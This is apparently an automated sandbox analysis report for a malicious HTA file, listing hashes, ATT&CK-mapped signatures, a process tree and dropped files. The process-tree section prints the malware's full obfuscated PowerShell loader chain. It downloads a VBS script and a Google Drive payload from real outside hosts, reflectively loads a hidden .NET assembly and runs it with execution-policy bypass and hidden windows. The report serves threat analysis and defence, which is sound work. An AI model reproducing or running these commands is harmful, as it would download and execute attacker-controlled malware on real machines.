Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
29-10-2024 12:17
Static task
static1
Behavioral task
behavioral1
Sample
goodthingstoapprovethebestwaytounderstandhowmuchgood.hta
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
goodthingstoapprovethebestwaytounderstandhowmuchgood.hta
Resource
win10v2004-20241007-en
General
-
Target
goodthingstoapprovethebestwaytounderstandhowmuchgood.hta
-
Size
131KB
-
MD5
c8cbdfd8a9cde5597983e48f8a9dff18
-
SHA1
df42a953a8f67e4bc41d8cb1cc9a707bd358617c
-
SHA256
98423a9f9031d55d618d2b6247e6724a96264cc7f10a20fb35ee475fada464c7
-
SHA512
18a54603e30fa03c6f6671a0d47eb7fe9942f7aefc038649222aa204561a3c50fe775c2c83c4d240757ef82fcbdaa4c86c8fe1e249c30abdd6bc76b16a8b4587
-
SSDEEP
96:4vCt7Qm6c4rJAcUJrH6FE4/JCgfXjaPW8/85ScHtcYggzZbrUZcKqQ:4vCF3KrJ2rg3Ugy6rDQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2636 poWERsHELl.eXe 6 1808 powershell.exe 8 1808 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1656 powershell.exe 1808 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2840 powershell.exe 2636 poWERsHELl.eXe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language poWERsHELl.eXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2636 poWERsHELl.eXe 2840 powershell.exe 2636 poWERsHELl.eXe 2636 poWERsHELl.eXe 1656 powershell.exe 1808 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2636 poWERsHELl.eXe Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeDebugPrivilege 1808 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2404 wrote to memory of 2636 2404 mshta.exe 30 PID 2404 wrote to memory of 2636 2404 mshta.exe 30 PID 2404 wrote to memory of 2636 2404 mshta.exe 30 PID 2404 wrote to memory of 2636 2404 mshta.exe 30 PID 2636 wrote to memory of 2840 2636 poWERsHELl.eXe 32 PID 2636 wrote to memory of 2840 2636 poWERsHELl.eXe 32 PID 2636 wrote to memory of 2840 2636 poWERsHELl.eXe 32 PID 2636 wrote to memory of 2840 2636 poWERsHELl.eXe 32 PID 2636 wrote to memory of 2864 2636 poWERsHELl.eXe 33 PID 2636 wrote to memory of 2864 2636 poWERsHELl.eXe 33 PID 2636 wrote to memory of 2864 2636 poWERsHELl.eXe 33 PID 2636 wrote to memory of 2864 2636 poWERsHELl.eXe 33 PID 2864 wrote to memory of 2148 2864 csc.exe 34 PID 2864 wrote to memory of 2148 2864 csc.exe 34 PID 2864 wrote to memory of 2148 2864 csc.exe 34 PID 2864 wrote to memory of 2148 2864 csc.exe 34 PID 2636 wrote to memory of 2364 2636 poWERsHELl.eXe 36 PID 2636 wrote to memory of 2364 2636 poWERsHELl.eXe 36 PID 2636 wrote to memory of 2364 2636 poWERsHELl.eXe 36 PID 2636 wrote to memory of 2364 2636 poWERsHELl.eXe 36 PID 2364 wrote to memory of 1656 2364 WScript.exe 37 PID 2364 wrote to memory of 1656 2364 WScript.exe 37 PID 2364 wrote to memory of 1656 2364 WScript.exe 37 PID 2364 wrote to memory of 1656 2364 WScript.exe 37 PID 1656 wrote to memory of 1808 1656 powershell.exe 39 PID 1656 wrote to memory of 1808 1656 powershell.exe 39 PID 1656 wrote to memory of 1808 1656 powershell.exe 39 PID 1656 wrote to memory of 1808 1656 powershell.exe 39
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\goodthingstoapprovethebestwaytounderstandhowmuchgood.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\SysWOW64\WindowSpOwERshelL\v1.0\poWERsHELl.eXe"C:\Windows\SystEm32\WindowSpOwERshelL\v1.0\poWERsHELl.eXe" "POwersHell -EX bYPaSs -nop -W 1 -C DEVicECRedENtiAlDepLOyMEnT ; iex($(iEx('[sYsTeM.teXt.ENCOdinG]'+[ChaR]0X3a+[chAr]58+'UTF8.gETsTrINg([sySteM.cONVErt]'+[ChAr]58+[chaR]58+'fRombaSe64STRiNg('+[cHAr]0x22+'JDBjWklXOXhNdFR4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFUkRFRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWklDaFJKY2l4a04sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ4a0dZZERlZnIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJd3NkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCb1JuKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVc1hUUWciICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnFreiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwY1pJVzl4TXRUeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzMxMi91dGhpbmtpYW10aGVnb29kdGhpbmdzZm9ydWdpdmVubWViZXN0dGhpbmdzdG9kb3dpdGhtZS50SUYiLCIkRU52OkFQUERBVEFcdXRoaW5raWFtdGhlZ29vZHRoaW5nc2ZvcnVnaXZlbm1lYmVzdHRoaW5nc3RvZC52YlMiLDAsMCk7U1RBUnQtc0xlZXAoMyk7c1RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVx1dGhpbmtpYW10aGVnb29kdGhpbmdzZm9ydWdpdmVubWViZXN0dGhpbmdzdG9kLnZiUyI='+[ChAr]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSs -nop -W 1 -C DEVicECRedENtiAlDepLOyMEnT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vx5j-siy.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D88.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9D87.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2148
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\uthinkiamthegoodthingsforugivenmebestthingstod.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnN3ZZaW1hZ2VVcmwgPSB3MlBodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciB3MlA7N3ZZd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlJysnYkNsaWVudDs3dllpbWFnZUJ5dGVzID0gN3ZZd2ViQ2xpZW50LkRvd25sb2FkRGF0YSg3dllpbWFnZVVybCk7N3ZZJysnaW1hJysnZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoN3ZZaW1hZ2VCeXRlcyk7N3ZZc3RhcnQnKydGbGFnID0gdzJQPDxCQVNFNjRfU1RBUlQ+PncyUDsnKyc3dlllbmRGbGFnID0gdzJQPDxCQVNFJysnNjRfRU5EPj53MlA7N3ZZc3RhcnRJbmRleCA9IDd2WWltYWdlVGV4dC5JbmRleE9mKDd2WXN0YXJ0RmxhJysnZyk7N3ZZZW5kSW5kZXggPSA3dllpbWFnZVRleHQuSW5kZXhPZig3dlllbmRGbGFnKTs3dllzdGFydEluZGV4IC1nZSAwIC1hbmQgN3ZZZW5kSW5kZXggLWd0IDd2WXN0YXJ0SW5kZXg7N3ZZc3RhcnRJbicrJ2RleCArPSA3dllzdGFydEZsYWcuTGVuJysnZ3QnKydoOzd2WWJhc2U2NExlbmd0aCA9IDd2WWVuZEluZGV4IC0gN3ZZc3RhcnRJbmRleDs3dlliYXNlNjRDb21tYW5kID0gN3ZZaW1hZ2VUZXh0LlN1YnN0cmluZyg3dllzdGFydEluZGV4LCA3dlliYXNlNjRMZW5ndGgpOzd2WWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKDd2WWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBqR3cgRm9yRWFjaC1PYmplY3QgeyA3dllfIH0pWy0xLi4tKDd2WWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07N3ZZY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5DbycrJ252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0JysncmluZyg3dlliYXNlNjRSZXZlcnNlZCk7N3ZZbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1iJysnbHldOjpMb2FkKDd2WWNvbW1hJysnbmRCeXRlcyk7N3ZZdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3MlBWQUl3MlApOzd2WXZhaU1ldGhvJysnZC5JbnZva2UoN3ZZbnVsbCwgQCh3MlB0eHQuU0dPTEtMLzIxMy81NTEuODcxLjY0Ljg5MS8vOnB0dGh3MlAsIHcyJysnUGRlc2F0aXZhZG93MlAsIHcyUGRlc2F0aXZhZG93MlAsIHcyUGRlJysnc2F0aXZhZG93MlAsJysnIHcyUGFzcG5ldF9yZWdiJysncm93c2Vyc3cyUCwgdzJQZGVzYXRpdmFkb3cyUCwgdzJQZGVzYXRpdmFkb3cyUCx3MlBkZXNhdGl2YWRvdzJQLHcyUGRlc2F0aXZhZG93MlAsdzJQZGVzJysnYXRpdmFkb3cyUCx3MlBkZXNhdGl2YWRvdzJQLHcyUGRlc2EnKyd0aXYnKydhZG93JysnMlAsdzJQMXcyUCx3MlBkZXNhdGl2YWRvdzJQKSk7JykgLUNyRVBsQWNlKFtjSGFSXTExOStbY0hhUl01MCtbY0hhUl04MCksW2NIYVJdMzkgLXJFcGxBY2UgICc3dlknLFtjSGFSXTM2LXJFcGxBY2Unakd3JyxbY0hhUl0xMjQpIHwgJiAoICRwc0hvTUVbMjFdKyRwc0hvTUVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('7vYimageUrl = w2Phttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur w2P;7vYwebClient = New-Object System.Net.We'+'bClient;7vYimageBytes = 7vYwebClient.DownloadData(7vYimageUrl);7vY'+'ima'+'geText = [System.Text.Encoding]::UTF8.GetString'+'(7vYimageBytes);7vYstart'+'Flag = w2P<<BASE64_START>>w2P;'+'7vYendFlag = w2P<<BASE'+'64_END>>w2P;7vYstartIndex = 7vYimageText.IndexOf(7vYstartFla'+'g);7vYendIndex = 7vYimageText.IndexOf(7vYendFlag);7vYstartIndex -ge 0 -and 7vYendIndex -gt 7vYstartIndex;7vYstartIn'+'dex += 7vYstartFlag.Len'+'gt'+'h;7vYbase64Length = 7vYendIndex - 7vYstartIndex;7vYbase64Command = 7vYimageText.Substring(7vYstartIndex, 7vYbase64Length);7vYbase64Reversed = -join (7vYbase64Command.ToCharArray() jGw ForEach-Object { 7vY_ })[-1..-(7vYbase64Command.Length)];7vYcommandBytes = [System.Co'+'nvert]::F'+'romBase64St'+'ring(7vYbase64Reversed);7vYloadedAssembly = [System.Reflection.Assemb'+'ly]::Load(7vYcomma'+'ndBytes);7vYvaiMethod = [dnlib.IO.Home].GetMethod(w2PVAIw2P);7vYvaiMetho'+'d.Invoke(7vYnull, @(w2Ptxt.SGOLKL/213/551.871.64.891//:ptthw2P, w2'+'Pdesativadow2P, w2Pdesativadow2P, w2Pde'+'sativadow2P,'+' w2Paspnet_regb'+'rowsersw2P, w2Pdesativadow2P, w2Pdesativadow2P,w2Pdesativadow2P,w2Pdesativadow2P,w2Pdes'+'ativadow2P,w2Pdesativadow2P,w2Pdesa'+'tiv'+'adow'+'2P,w2P1w2P,w2Pdesativadow2P));') -CrEPlAce([cHaR]119+[cHaR]50+[cHaR]80),[cHaR]39 -rEplAce '7vY',[cHaR]36-rEplAce'jGw',[cHaR]124) | & ( $psHoME[21]+$psHoME[30]+'X')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50b1fd9e4c86c5f141e9449edff21ce12
SHA1d1597a773ac4ba74a129fa6acd381da1ed3224ce
SHA256cc404d76d0acc09031ee8826f696419e3290aa27e70656e360d3cb9c52fe8cba
SHA512d5b840e207dc5dcd0e075201afcbc40df32f62fe20a73d44237c43f9623aef1fc9f6ac48a33742dc0af1e311e573432132cbffa52bd36b69c4bdab628d6d4a3a
-
Filesize
3KB
MD57370dcbc7e717e9c64508d8d993c7b47
SHA1a8e5b21b31523b1c5c86ae5e6f84de45173bed40
SHA2560d8e4d49734d480ce326d660971e9c9cec54d794c75b5398422e3dc6852f0308
SHA51254ff4a6962f03e0b58f32d3c8e0ceaa29027cc91329ba73fb1579f64c031e7bde7268096ba6e56a0fe40e736f4ece780d0cef6eff1f923a67af612ee6fc9a74d
-
Filesize
7KB
MD5a069cf4f1772adcbb38a9c660347f1c6
SHA1ad756907b66dcec9bec93aac8689180aa074fb98
SHA256663e215a90f1e5cfdb2b55e7d52e42f6b405a801e9347ad8b01f81fa921ddbf6
SHA51206856b0679385509ca4aa511a941ee0c287af90424922c2468c22a1b06ebef13b7ca6ef678b5a00c5ae5ac9715d3dcba707f7846709f78f7f01e75594d4c771e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5cd52653f65562d127287134a6443a415
SHA1d1e472b22a6a6882a76614adf53c9842960867e7
SHA256d87cbb79cfa05e00b6e2f9308b8fddca3b8cb800e2ae3c413e791b1dedec81dc
SHA5122655677b3355cfac99c004b746eb06f0cd97b9d20a4a765e24b39f6c82633c5ba64ce19763206eff54ae4feaf8f7787dc7ef1891d4d6d68572c16cc54ee2887c
-
Filesize
136KB
MD5f1580330671ef5f9f2c0525092a52a1e
SHA1e22a52d31f506f4b23fffdf438b2a87c630520d3
SHA256aa9e57ff6fa9792bc9f8bd02acbd5d248f2e6e361e0516a8972265a90002ed6b
SHA512940477c296ff67079eaed9cf0a0e894450b919e6d8416e7bc0b8c0031c8c16d5ad1d9a4757d17627cc9f2ceb331f0f432e78d8621497fcf2085e37ea39ca6fa3
-
Filesize
652B
MD50cb40b83b844a46c039506d557c84b09
SHA1068fee6cdbbb26790e30c7618f2c1e3822c50e12
SHA2565f18d558edba7d72aafb949a45b37ed5b23161c64583bc10d3588cefcde0be3f
SHA512334c9f513fddd3818170c960f8ba9f8e1745ce9a37284c3407745da014b444bf76d87101f955228d88943d3d5d790a59545da0f1f11f13f8eed5c64ff5cdaad5
-
Filesize
461B
MD547833bec615200eabb6b94b9402215d9
SHA10d09d6af10eb9d2eaa1f0b3083d7417715634610
SHA256ca55753945475d20ea711d447df602805205d08d77f7fb3495b85e90cb759e02
SHA512f94e3794f1efd72a4dd88ffa98f4be25b165281f5184e31522995e683b6b17ae4c898127927e7ec257d3794405c560e7b1e5d9c941c88e6a79c95cef794ceeb4
-
Filesize
309B
MD56e4996f91ee6770f4f6eeefebbcf50b5
SHA18b467e6a103a3e3fbad483ce6149a5a092e4b049
SHA256450e8d63f68dd61c6443662e6ea595247ac60e051a6bee7973e95c51ecdc2345
SHA5120bb148ecbcd94c4b01a5630794b3e1c35b3fdba5b1c314632f367b09aef76c9645f7f41b9319e56eacc91baeb0452ca9ab29d014cd371a415ca5d37d6dc5e755